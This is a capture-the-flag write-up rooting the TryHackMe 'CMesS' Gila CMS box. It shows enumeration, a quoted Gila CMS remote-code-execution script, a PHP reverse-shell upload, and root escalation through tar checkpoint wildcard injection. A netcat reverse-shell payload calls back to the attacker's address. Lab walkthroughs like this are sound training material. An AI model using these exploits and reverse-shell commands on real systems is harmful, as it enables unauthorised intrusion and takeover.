TryHackMe - CMesS

Can you root this Gila CMS box?

Please add  $IP cmess.thm to /etc/hosts

Please also note that this box does not require brute forcing!

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ sudo nano /etc/hosts
[sudo] password for kali:

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ sudo cat /etc/hosts | grep "cmess"
10.10.112.136   cmess.thm

Enumeration

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate 5000 -Pn cmess.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-06 17:24 EDT
Nmap scan report for cmess.thm (10.10.112.136)
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 15.55 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn -p 22,80 cmess.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-06 17:24 EDT
Nmap scan report for cmess.thm (10.10.112.136)
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d9b652d3939a3850b4233bfd210c051f (RSA)
|   256 21c36e318b85228a6d72868fae64662b (ECDSA)
|_  256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-generator: Gila CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   185.34 ms 10.9.0.1
2   185.61 ms cmess.thm (10.10.112.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds

Only 2 simple ports are opened: 80 and 22. And all of the dirs from robots.txt are disallowed entries → I have no way out to get access them. Let check the main page first:

Untitled

No hidden information in the page’s source:

Page's Source
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
<!DOCTYPE html>
<html lang="en">
<head><base href="http://cmess.thm/">
<title></title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="generator" content="Gila CMS">
<link href="lib/gila.min.css" rel="stylesheet"><link href="lib/font-awesome/css/font-awesome.min.css" rel="stylesheet"></head><style>
body{background:#fcfcfc}
:root{--main-primary-color: orangered;}
body{font-family:'Arial', sans-serif;}
h1,h2,h3,.widget-title,.header{font-family:Arial,sans-serif;}
.widget-title,.header{font-size:1.1em}
.widget{margin-top: 20px; padding: 0 8px}
.widget-title{border-bottom: 4px solid orangered; display:inline-block;}
.widget>div:nth-child(2){border-top: 1px solid #ccc}
.widget:before{content: ""; width:100%; margin-top: 12px; border-bottom: 1px solid #ccc;}
.widget .g-nav.vertical li{border-bottom: 1px solid #ddd}
.widget .g-nav.vertical li a{color: #181818;padding: 4px 12px}
.widget .g-nav.vertical li a:hover{color: orangered;}
.post-review a{color: #181818;margin-bottom: 10px;}
.post-review a:hover{color: orangered;}
.sidebar{padding-left:16px; min-height:400px}
li.active{background-color:var(--main-primary-color); color:white;}
.header{margin-bottom: 20px;   background-color: #262626;
background-size: cover;
background-position-y: center;
background-position-x: center;}
footer{background:#464a49;margin-top:10px;color:white}
.footer-text,footer a,footer a:hover{color:#ccc; }
.widget-social-icons {list-style: none;padding:0 }
.widget-social-icons li{margin: 15px 10px 0 0; float: left; text-align: center; opacity: 0.8}
.widget-social-icons li a i:before{
  width: 40px;
  margin: 0;
  color: #fff;
  font-size: 20px;
  line-height: 40px;
  display:inline-block;
  background: #060608;
}
.widget-social-icons li a i:hover:before{background: orangered;}
.g-navbar li ul li a{color:inherit}
.g-nav li ul{border-width:0; background: #181818; margin-top:-2px}
</style>

<body>
    <div class="header" style="padding:0 10px;">
    <div style="max-width:1100px; margin:auto;">
                <div class="gl-9" style="height:200px;text-shadow:0 0 6px black">
          <h1><a href="http://cmess.thm/" style="color:#f5f5f5;">Gila CMS</a></h1>
          <div style="color:#f5f5f5;margin-bottom:6px">An awesome website!</div>
        </div>
        <!-- Navigation -->
        <div class="gl-9">
        <nav class="inline-flex g-navbar">
            <span style=""><ul class="g-nav">
<li class="active"><a href="">Home</a></li><li><a href="about" >About</a></li></ul>
</span>
        </nav>
        </div>
    </div>
    </div>

    <div style="padding:0 10px">
    <div style="max-width:1100px; margin:auto;">

<!-- Posts -->
<div class="row wrapper">
    <div class="gm-9">
        <div class="row gap-8px post-review">

        <div class="gm-12">
            <a href="1/hello_world">
                <h2 class="post-title" style="margin-top:0">Hello World</h2>
            </a>
            This is the first post        </div>
    </div><!--hr-->
        <!-- Pagination -->
    <ul class="g-nav pagination">

</ul>
    </div>
    <div class="gm-3 sidebar">
      <form method="get" class="inline-flex" action="http://cmess.thm/">
        <input name='search' class="g-input fullwidth" value="">
        <button class="g-btn g-group-item" onclick='submit'>Search</button>
    </form>
          </div>
</div>

</div>
</div>

<footer  class="fullwidth pad"  style="">
  <div style="max-width:900px; margin:auto">
    <div class="footer-widget">
            </div>
    <p class="copyright footer-text">
        Copyright &copy; Your Website 2017        <span style="float:right">Powered by <a href="http://gilacms.com" target="_blank">Gila CMS</a></span>
    </p>
  </div>
</footer>
<script src="src/core/assets/lazyImgLoad.js" async></script>
</body>
<div class="pad">
</div>
</html>


When I clicked on the Search button, the URL become:

http://cmess.thm/?search=

However, after trying many way to inject the param search with LFI or RFI, I found nothing.

At the current, I don’t have any information about the Gila version → I cannot find the exploit path for a specific version.

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ searchsploit "gila"
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Gila CMS 1.11.8 - 'query' SQL Injection                                           | php/webapps/48590.py
Gila CMS 1.9.1 - Cross-Site Scripting                                             | php/webapps/46557.txt
Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)                          | php/webapps/49412.py
Gila CMS < 1.11.1 - Local File Inclusion                                          | multiple/webapps/47407.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let’s take a dirs scan!

Dir Scan

┌──(kali㉿kali)-[~/Wordlists]
└─$ gobuster dir -w directory-list-2.3-medium.txt -t 50 --no-error -u http://cmess.thm/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cmess.thm/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/search               (Status: 200) [Size: 3851]
/about                (Status: 200) [Size: 3353]
/01                   (Status: 200) [Size: 4078]
/category             (Status: 200) [Size: 3862]
/robots.txt           (Status: 200) [Size: 65]
/themes               (Status: 301) [Size: 318] [--> http://cmess.thm/themes/?url=themes]
/blog                 (Status: 200) [Size: 3851]
/index                (Status: 200) [Size: 3851]
/feed                 (Status: 200) [Size: 735]
/0                    (Status: 200) [Size: 3851]
/admin                (Status: 200) [Size: 1580]
/assets               (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
/tag                  (Status: 200) [Size: 3874]
/sites                (Status: 301) [Size: 316] [--> http://cmess.thm/sites/?url=sites]
/author               (Status: 200) [Size: 3590]
/Search               (Status: 200) [Size: 3851]
/log                  (Status: 301) [Size: 312] [--> http://cmess.thm/log/?url=log]
/About                (Status: 200) [Size: 3339]
/tags                 (Status: 200) [Size: 3139]
/lib                  (Status: 301) [Size: 312] [--> http://cmess.thm/lib/?url=lib]
/Index                (Status: 200) [Size: 3851]
/1x1                  (Status: 200) [Size: 4078]
/src                  (Status: 301) [Size: 312] [--> http://cmess.thm/src/?url=src]
/api                  (Status: 200) [Size: 0]
/001                  (Status: 200) [Size: 4078]
/cm                   (Status: 500) [Size: 0]
/1pix                 (Status: 200) [Size: 4078]
/fm                   (Status: 200) [Size: 0]
/tmp                  (Status: 301) [Size: 312] [--> http://cmess.thm/tmp/?url=tmp]
/1a                   (Status: 200) [Size: 4078]
/0001                 (Status: 200) [Size: 4078]
/1x1transparent       (Status: 200) [Size: 4078]
/INDEX                (Status: 200) [Size: 3851]
/1px                  (Status: 200) [Size: 4078]

It took me much time to enumerate every dirs but nothing seem really helpful except the login page. So I need to do the sub-domain enumeration instead to figure out the creds for the login.

Sub-domain Scan

┌──(kali㉿kali)-[~]
└─$ wfuzz -w ~/Wordlists/subdomains-top1mil-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm"
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000029:   200        107 L    290 W      3877 Ch     "old"
000000001:   200        107 L    290 W      3877 Ch     "www"
000000027:   200        107 L    290 W      3874 Ch     "mx"
000000028:   200        107 L    290 W      3880 Ch     "imap"
000000026:   200        107 L    290 W      3877 Ch     "vpn"
000000003:   200        107 L    290 W      3877 Ch     "ftp"
000000015:   200        107 L    290 W      3874 Ch     "ns"
000000007:   200        107 L    290 W      3889 Ch     "webdisk"
000000019:   200        30 L     104 W      934 Ch      "dev"
000000030:   200        107 L    290 W      3877 Ch     "new"
000000031:   200        107 L    290 W      3886 Ch     "mobile"
000000023:   200        107 L    290 W      3883 Ch     "forum"
000000024:   200        107 L    290 W      3883 Ch     "admin"
000000025:   200        107 L    290 W      3883 Ch     "mail2"
000000014:   200        107 L    290 W      3898 Ch     "autoconfig"
000000017:   200        107 L    290 W      3871 Ch     "m"
000000020:   200        107 L    290 W      3880 Ch     "www2"
000000018:   200        107 L    290 W      3880 Ch     "blog"
000000022:   200        107 L    290 W      3880 Ch     "pop3"
000000021:   200        107 L    290 W      3877 Ch     "ns3"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 20
Filtered Requests: 0
Requests/sec.: 0

At the first time I ran the sub-domain scan, I notice that much result have the same Lines or Word count → I need to insert the flag --hw or --hl to hide them all:

┌──(kali㉿kali)-[~]
└─$ wfuzz -w ~/Wordlists/subdomains-top1mil-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" --hw 290
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000019:   200        30 L     104 W      934 Ch      "[REDACTED]"

Before viewing this sub-domain, I need to append it into the /etc/hosts too:

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ sudo nano /etc/hosts

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ sudo cat /etc/hosts | grep "cmess"
10.10.112.136   cmess.thm
10.10.112.136   [REDACTED].cmess.thm

Then use curl or simply type the URL on web-browser:

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ curl http://[REDACTED].cmess.thm/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Development</title>
</head>
<body>
    <h2>Development Log</h2>
<article>
    <h3>[REDACTED]@cmess.thm</h3>
    <p>Have you guys fixed the bug that was found on live?</p>
</article>
    <article>
        <h3>support@cmess.thm</h3>
        <p>Hey [REDACTED], We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!</p>

    </article>
    <article>
        <h3>support@cmess.thm</h3>
        <p>Update! We have had to delay the patch due to unforeseen circumstances</p>
    </article>
    <article>
        <h3>[REDACTED]@cmess.thm</h3>
        <p>That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.</p>
    </article>
    <article>
        <h3>support@cmess.thm</h3>
        <p>Your password has been reset. Here: [REDACTED] </p>
    </article>
</body>
</html>

Untitled

Exploit

Now I had the creds for the login page. Let’s route to the dir /login:

Untitled

It would automatically route me back to the main page. To access the dashboard page, I have to navigate the path to /admin:

Untitled

Look at the bottom of the page → The running Gila version is 1.10.9 which could be exploit with the following path:

---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)                          | php/webapps/49412.py
---------------------------------------------------------------------------------- ---------------------------------

The content of the exploit file is:

# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0
# Tested on: Windows 10

import requests
import time

target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"

url = target_url+"?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php';  ?>"}
requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
requests.get(target_url+"/index.php")

However, I have more simple way to exploit in this case. Navigate to the side-bar > Hover the Content > Click on File Manager:

Untitled

Prepare a reverse shell on the attack machine and upload it:

Untitled

Untitled

Untitled

Start a listener:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

To open the shell, route to the following URL: http://cmess.thm/assets/shell.php and then I get connected to the target:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.63.75] from (UNKNOWN) [10.10.112.136] 56982
Linux cmess 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 14:55:18 up 30 min,  0 users,  load average: 61.68, 58.55, 48.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Let’s upgrade the shell to get the better one:

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cmess:/$ pwd
pwd
/

Privilege Escalation → normal user

From this point, you can use other tools to auto enumerate the machine. In my report, I will perform the manual way either.

Navigate to directory /opt/:

www-data@cmess:/$ cd /opt/
cd /opt/
www-data@cmess:/opt$ ls -la
ls -la
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak

Read the file .password.bak and get the creds of the mentioned user:

www-data@cmess:/opt$ cat .password.bak
cat .password.bak
[REDACTED]s backup password
[REDACTED]

Use that creds to escalate to the user → cd to the user’s work-place and get the flag:

www-data@cmess:/opt$ su [REDACTED]

su [REDACTED]
Password:
su: Authentication failure
www-data@cmess:/opt$ su [REDACTED]
su [REDACTED]
Password: [REDACTED]

[REDACTED]@cmess:/opt$ cd
cd
[REDACTED]@cmess:~$ ls -l
ls -l
total 8
drwxr-x--- 2 [REDACTED] [REDACTED] 4096 Feb  9  2020 backup
-rwxr-x--- 1 [REDACTED] [REDACTED]   38 Feb  6  2020 user.txt
[REDACTED]@cmess:~$ cat user.txt
cat user.txt
thm{[REDACTED]}

Privilege Escalation → root

I tried with sudo -l command but it did not work:

[REDACTED]@cmess:~$ sudo -l
sudo -l
[sudo] password for [REDACTED]: [REDACTED]

Sorry, user [REDACTED] may not run sudo on cmess.

Therefore, I use another common way to escalate privilege is cronjobs enumeration:

[REDACTED]@cmess:~$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/[REDACTED]/backup && tar -zcf /tmp/[REDACTED]_backup.tar.gz *

Look at the bottom line, the root user had been set to automatically use tar to extract the [REDACTED]_backup.tar.gz into /home/[REDACTED]/backup directory. There is a technique to exploit the tar service and other similar ones called Wildcard Injection. I will follow the instruction from this source: (Use the given keyword to read more about this vulnerability)

First, I will verify that the netcat service is available on the target machine:

[REDACTED]@cmess:~/backup$ whereis netcat
whereis netcat
netcat: /bin/netcat /usr/share/man/man1/netcat.1.gz
[REDACTED]@cmess:~/backup$ ls -l /bin/ | grep "netcat"
ls -l /bin/ | grep "netcat"
lrwxrwxrwx 1 root root      24 Feb  6  2020 netcat -> /etc/alternatives/netcat

I create a reverse shell payload using msfvenom:

┌──(kali㉿kali)-[~/TryHackMe/cmess]
└─$ msfvenom -p cmd/unix/reverse_netcat lhost=10.9.63.75 lport=4445 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 88 bytes
mkfifo /tmp/cloz; nc 10.9.63.75 4445 0</tmp/cloz | /bin/sh >/tmp/cloz 2>&1; rm /tmp/cloz

Then I use the payload to create a shell inside the backup/ directory:

[REDACTED]@cmess:~$ echo "mkfifo /tmp/cloz; nc 10.9.63.75 4445 0</tmp/cloz | /bin/sh >/tmp/cloz 2>&1; rm /tmp/cloz" > backup/shell.sh
<4445 0</tmp/cloz | /bin/sh >/tmp/cloz 2>&1; rm /tmp/cloz" > backup/shell.sh
[REDACTED]@cmess:~$ ls -l backup
ls -l backup
total 8
-rwxr-x--- 1 [REDACTED] [REDACTED] 51 Feb  9  2020 note
-rw-rw-r-- 1 [REDACTED] [REDACTED] 89 Sep  6 15:16 shell.sh

After that, execute these following commands:

[REDACTED]@cmess:~/backup$ echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint-action=exec=sh shell.sh"
[REDACTED]@cmess:~/backup$ echo "" > --checkpoint=1
echo "" > --checkpoint=1

💡 Read more about tar’s checkpoint from https://www.gnu.org/software/tar/manual/html_section/checkpoints.html

Start another listener and wait for awhile to get access as root user:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.9.63.75] from (UNKNOWN) [10.10.112.136] 48506
id
uid=0(root) gid=0(root) groups=0(root)

Upgrade the shell for a better view and get the root flag:

python3 -c "import pty;pty.spawn('/bin/bash')"
root@cmess:/home/[REDACTED]/backup# cd
cd
root@cmess:~# ls -l
ls -l
total 4
-rw-r--r-- 1 [REDACTED] [REDACTED] 38 Feb  6  2020 root.txt
root@cmess:~# cat root.txt
cat root.txt
thm{[REDACTED]}